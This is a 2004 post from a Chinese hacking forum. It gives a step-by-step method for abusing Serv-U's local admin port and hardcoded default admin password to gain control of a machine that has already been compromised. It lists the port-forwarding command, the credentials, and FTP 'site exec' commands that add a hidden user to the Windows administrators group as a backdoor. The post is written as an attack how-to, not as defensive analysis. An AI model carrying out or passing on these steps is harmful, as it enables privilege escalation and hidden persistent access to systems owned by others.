黑色海岸线论坛 - Powered by Discuz! Board

标题: 利用SERV-U做个后门 [打印本页]

作者: 大漠的苍凉 时间: 2004-11-9 06:52 标题: 利用SERV-U做个后门

[serv-u默认监听127.0.0.1:43958，所以只有在本机才能连接这个管理端口。
serv-u默认管理账号是LocalAdministrator,默认密码是"#l@$ak#.lk;0@P"，这个密码在同一个
版本中是固定的，也许在不同的版本中也是固定的。
假如目标机器IP是192.168.0.1，假如你已经有了一个目标机器的普通权限的SHELL，那么你
在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1，然后在你自己的机器，用"serv-u
admin"新建SERVER，
192.168.0.1:12345
User:LocalAdministrator
Pass:"#l@$ak#.lk;0@P"
，那么目标机器的serv-u就归你管了。
(不需要能终端或物理控制台登录，只要有个shell，能运行端口数据转发的程序就可以了]
这种方法我在本地测试呢一下发现效果非常的好~！
转念一想，可以用他做个后门
方法同上
在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1，然后在你自己的机器，用"serv-u
admin"新建SERVER，
192.168.0.1:12345
User:LocalAdministrator
Pass:#l@$ak#.lk;0@P
连上后，先建一个用户目录指向c:\ 给他执行权限
使用方法
cmd
ftp 192.168.0.1
username
password
ftp>cd /winnt/system32
ftp>quote site exec net.exe user neeao neeao /add
ftp>quote site exec net.exe localgroup administrators neeao /add
一个非常隐蔽的后门做成了

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)